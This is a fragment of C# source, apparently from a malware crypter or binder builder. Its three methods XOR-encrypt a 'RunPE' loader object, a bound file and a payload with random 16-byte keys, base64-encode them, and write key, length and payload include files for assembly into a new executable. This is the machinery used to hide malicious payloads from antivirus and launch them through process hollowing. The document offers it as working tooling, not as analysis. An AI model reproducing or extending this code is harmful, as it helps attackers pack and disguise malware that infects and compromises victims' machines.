public static void EncryptCodeAndAddKey(NewPE PE) { byte[] pKey = new byte[16]; Keys.PopulateBuffer(pKey); byte[] pRunPE = PE.PeDirectory.RunPEObjectPath.ReadBytes(); Xor.EncodeDecodeData(pRunPE, pKey); if (File.Exists(PE.PeDirectory.RunPEObjectPath)) { File.Delete(PE.PeDirectory.RunPEObjectPath); } PE.PeDirectory.RunPEObjectPath.WriteFile(pRunPE); string KeyInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "runpe_key.inc"); string Format = pKey.ToASMBuffer(); if (File.Exists(KeyInclude)) { File.Delete(KeyInclude); } File.WriteAllText(KeyInclude, Format); PEFactory.CompileDataSection(PE); }
public static void EncryptAndEncodeBind(NewPE PE, string BindPath) { byte[] pKey = PE.PeDirectory.PayloadKeyIncPath.ReadBytes(); byte[] pBind = BindPath.ReadBytes(); Xor.EncodeDecodeData(pBind, pKey); pBind = new ASCIIEncoding().GetBytes(Convert.ToBase64String(pBind)); if (File.Exists(PE.PeDirectory.BindIncPath)) { File.Delete(PE.PeDirectory.BindIncPath); } File.WriteAllBytes(PE.PeDirectory.BindIncPath, pBind); }
public static void EncryptAndEncodePayload(NewPE PE, string PayloadPath) { byte[] pKey = new byte[16]; Keys.PopulateBuffer(pKey); byte[] pFileBuffer = PayloadPath.ReadBytes(); Xor.EncodeDecodeData(pFileBuffer, pKey); pFileBuffer = new ASCIIEncoding().GetBytes(Convert.ToBase64String(pFileBuffer)); string PayloadLengthInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_length.inc"); string Format = "PAYLOAD_LENGTH EQU 0x{0}"; Format = string.Format(Format, pFileBuffer.Length.ToString("X8")); if (File.Exists(PayloadLengthInclude)) { File.Delete(PayloadLengthInclude); } File.WriteAllText(PayloadLengthInclude, Format); string PayloadKeyInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_key.bin"); string PayloadInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload.bin"); if (File.Exists(PayloadKeyInclude)) { File.Delete(PayloadKeyInclude); } if (File.Exists(PayloadInclude)) { File.Delete(PayloadInclude); } File.WriteAllBytes(PayloadKeyInclude, pKey); File.WriteAllBytes(PayloadInclude, pFileBuffer); }